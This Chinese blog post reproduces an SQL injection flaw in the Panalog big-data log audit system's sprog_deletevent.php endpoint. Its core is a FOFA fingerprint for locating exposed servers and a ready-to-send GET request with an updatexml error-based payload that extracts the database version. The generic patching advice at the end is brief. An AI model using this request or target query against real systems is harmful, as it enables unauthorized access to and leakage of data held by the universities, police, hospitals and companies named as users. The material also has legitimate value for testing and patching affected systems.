博客
关于我
Panalog 日志审计系统 sprog_deletevent.php SQL 注入漏洞复现
阅读量:793 次
发布时间:2023-02-26

本文共 587 字,大约阅读时间需要 1 分钟。

Panalog 大数据日志审计系统

产品简介

Panalog 大数据日志审计系统是一款专注于高校、公安、政企、医疗、金融、能源等行业的网络流量分析平台。系统通过大数据采集、分析和整合技术,对用户网络行为进行审计,提供全方位的网络安全管理解决方案。

SQL 注入漏洞概述

系统中 Panabit/Maintain/sprog_deletevent.php 文件的 id 参数存在 SQL 注入漏洞。攻击者可通过构造特定 SQL 语句,获取数据库信息并进一步利用,造成敏感信息泄露和其他安全风险。

漏洞复现环境

系统运行环境:

  • FOFAapp="Panabit-Panalog" & port="8012"
  • 服务器配置:需确保系统运行中 srog_deletevent.php 文件路径正确。

漏洞复现 PoC

GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+version%28%29)),0)&cloudip=1 HTTP/1.1
Host: your-ip
User-Agent: Mo

安全建议

  • 权限管理:及时审核用户权限,防止未授权访问。
  • 测试工具:使用专用工具对系统进行定期安全测试。
  • 系统更新:保持系统及插件更新,防止已知漏洞利用。

转载地址:http://wnvfk.baihongyu.com/

你可能感兴趣的文章
OSI七层模型与TCP/IP五层模型(转)
查看>>
OSI七层模型与TCP/IP四层与五层模型详解
查看>>
OSI七层模型的TCP/IP模型都有哪几层和他们的对应关系?
查看>>
OSI操作系统(NETBASE第八课)
查看>>
OSM数据如何下载使用(地图数据篇.11)
查看>>
OSPF 四种设备角色:IR、ABR、BR、ASBR
查看>>
OSPF 四种路由类型:Intra Area、Inter Area、第一、二类外部路由
查看>>
OSPF 学习
查看>>
OSPF 支持的网络类型:广播、NBMA、P2MP和P2P类型
查看>>
OSPF 概念型问题
查看>>
OSPF 的主要目的是什么?
查看>>
SQL Server 存储过程分页。
查看>>
OSPF不能发现其他区域路由时,该怎么办?
查看>>
OSPF两个版本:OSPFv3与OSPFv2到底有啥区别?
查看>>
SQL Server 存储过程
查看>>
OSPF在大型网络中的应用:高效路由与可扩展性
查看>>
OSPF太难了,这份OSPF综合实验请每位网络工程师查收,周末弯道超车!
查看>>
OSPF技术入门(第三十四课)
查看>>
OSPF技术连载10:OSPF 缺省路由
查看>>
OSPF技术连载11:OSPF 8种 LSA 类型,6000字总结!
查看>>